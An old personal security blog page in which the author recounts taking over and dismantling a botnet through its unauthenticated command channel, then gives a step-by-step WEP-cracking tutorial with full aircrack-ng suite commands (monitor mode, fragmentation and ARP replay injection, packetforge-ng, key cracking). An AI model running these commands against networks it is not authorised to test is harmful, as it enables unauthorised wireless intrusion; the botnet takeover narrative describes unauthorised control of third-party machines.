Security through Insecurity

A few months ago, this website was hacked by a Russian group for the purposes of hosting Malware, specifically a botnet trojan. Ultimately, they used this site for several purposes such as to find other vulnerable sites, provide a direct download of viruses, and as a somewhat anonymous proxy for them to use. I was aware of this almost immediately, and began reversing their files to find out just who made these programs, and where they were coming from.

I’ve been very busy this summer, taking on a Job, and joining the Volunteer Fire Department, so progress was slow. But eventually I found a surprising unsecure botnet that was being hosted primarily in China, but also with backup servers in India, and Russia. I found a pretty decent net, consisting of over 200,000 infections. Gaining roughly 20,000 a day, but they were selling more of them.

An authhost was set on the bots, but other than that, the password to get into the channel was very simple, and it was easy to blend in. These bots were quite, obviously due to size, as it would ping out any user who tried to command 1000′s of bots at once when they all reply.

Eventually I was able to fully dismantle the botnet, as they had a small backdoor in their bots, allowing for super anonymous communication, kind of like a p2p network. The bots could be given commands directly, which is very common now days, but there was no authentication. Furthermore, if you told the bot to spread the command, it would assign 9 other bots to due the same, and they would all message every bot in the channel and server the command, and jump to the other servers and due the same, until all bots were updated. It would have been a nice feature… had it been secure.

Either way, I issued a command to update the password for a week, until they were all under my command. At this point, the bot masters began realizing they were losing control, and attempted to shut down the servers, but failed. I don’t know why they failed, but it was humorous watching them panic.

After I had control of the general population, I stopped all the attacks these bots had been performing (everything from password cracking, exploit scanning, and spamming), and uninstalled them. From that point I simply said have a nice day to the former Bot Masters.

I finally cleaned up this webserver from all they did, I was just lazy about doing it. Any way, I thought I’d share that little mishap in my research of botnets. It all happened because I choose to take the easy way one day, a mistake I should have known not to do, and I won’t do again.

Comments more than welcome, as well as questions.
Also, would you like to write on this Blog? Contact me here, or through josh@joshhouston.net . I’m looking for some good articles, there is no pay, just something to do in your free time like I do, as I’m extremely busy now days. Video Tutorials are the best in my opinion, either way, whether it be text or video, all I ask is a Full, Detailed write-up as I do myself.

In this Video Tutorial, I show you how to crack a wireless network secured with WPA encryption. Although it may sound hard, it is actually quite easier than you may think. I also have provided a Written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) providing hosting for the videos. Video

In this Video Tutorial, I show you how to crack a wireless network secured with WEP encryption. Although it may sound hard, it is actually quite easier than you may think. I also have provided a Written tutorial for you to save, and the video is also available for download. The following are links to an outside website (mediafire) providing hosting for the videos. Video 1. Video 2.

1. Type in “airmon-ng” to see wireless adaptors on your computer.
2. You should see a listing come up. Mine showed wlan0. Yours may be different, such a rausb0.
   Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0” with whatever yours showed to be. This will create a new “virtual” device, and will show the name. The name for mine was “mon0“
3. Open a new terminal window, and type “airodump mon0” again, replacing “mon0” with your new virtual devices name.
   You will begin to see a listing of different APs (access points). Find the one you want and press Control + C. Pressing Control + C will cancel the current program running in terminal. The name of the networks found is under the ESSID column. You may not see anything there, which is fine, some of them are invisible. FUSiON is the name of my network, so I went over to the BSSID column, and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I could recommend copying it, or writing it down. Also take note of what channel it is on.
4. This is what I typed after that, “airodump-ng –bssid 00:23:69:18:E4:7D –channel 6 –ivs -w FUSiON mon0” This is all real easy stuff, so I’ll just explain it to you right quick. airodump-ng is the program that captures what is called IVs, the primary component in cracking WEP networks. Here goes!
   • Type “airodump-ng”
   • Add a space and type “–bssid 00:23:69:18:E4:7D” replacing the address with the address of your Network. This “flag” says we only want to see this address, and nothing else.
   • Add a space and type “–channel 6″ replacing the number 6 with the number of the channel of your Network (although 6 is VERY common, so don’t be surprised if that is it)
   • Add a space and type “–ivs” This command only captures IVs, which will make cracking the password faster.
   • Add a space and type “-w FUSiON” replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network, because it helps me remember easier.
   • The “mon0″ at the end, simply defines which device to use.
5. Open a New Terminal Window. In it, type “aireplay-ng -5 -b 00:23:69:18:E4:7D mon0″
   
   • aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn’t be possible to crack most WEP networks.
   • The “-5″ flag is one method, and the most common, that is used to generate the IVs.
   • The “-b 00:23:69:18:E4:7D” tells which address to attack. The -b stands for bssid which is the address of your network. So you will have to replace 00:23:69:18:E4:7D with the address of your network (the one that I recommended you write down or copy earlier).
   • The “mon0″ at the end, again just defines which device to use.
6. Wait and Press “Y” for yes, when it asks if you would like to use the selected frame.
7. This process may have to be repeated until you have a resulting fragment file. It will say when you do. Additionally, you can run this command “aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0″ to help assist with getting a fragment file. Again, make sure to replace my address, with your own.
8. Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
   “packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy”
   Let me break this down for you.
   • packetforge-ng is the program which will build the arp file, as I like to call it, which you will soon see.
   • Add a space, and follow it with “-0 -a 00:23:69:18:E4:7D” and of course, replace it with your own network address.
   • Add a space, and type in “-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255″ This part of the command is pretty universal, rarely is it changed. So we won’t go into detail on it here.
   • Add a space, and type in “-y fragment-XXXX-XXXXXX.xor”, replacing your fragment file, place of this one, as well.
   • And lastly, type in “-w arpy” just the -w is important. The arpy can be anything you can remember. It’s something I’ve just always used, cuz it’s easy for me to remember.
   • If all goes well, it Successfully built our Arp Packet.
9. Almost Done!  “aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0″ is our next command.
   • aireplay-ng, like before, should get those IVs flowing in. At an average, I see about 500 IVs/Second. Which isn’t too bad. But some cards do better than others, so you may have better, or worse luck.
   • -r arpy is a flag that tells aireplay-ng to play the arp file we created called arpy.
   • Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
10. If all went well, we are gathering IVs! Open the airodump-ng terminal window that we’ve had open, and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend you getting at least 100,000 IVs, I’ve never waited that long. I’ve cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumilated.
11. Once you have at least 40,000, we can start cracking the WEP Password!
    • This step, has to be the simplest.
    • Open a new Terminal window, and type “aircrack-ng XXXX-01.ivs” replacing the XXXX with what you used when you first started the airodump-ng command.
    • Depending on the speed of your computer, you will soon have the WEP Key Decrypted. Just make sure to remove the colons “:” before confirming the Key.

There we go, that is my tutorial on basic WEP cracking. Any Questions, Comments, or Suggestions are GREATLY appreciated!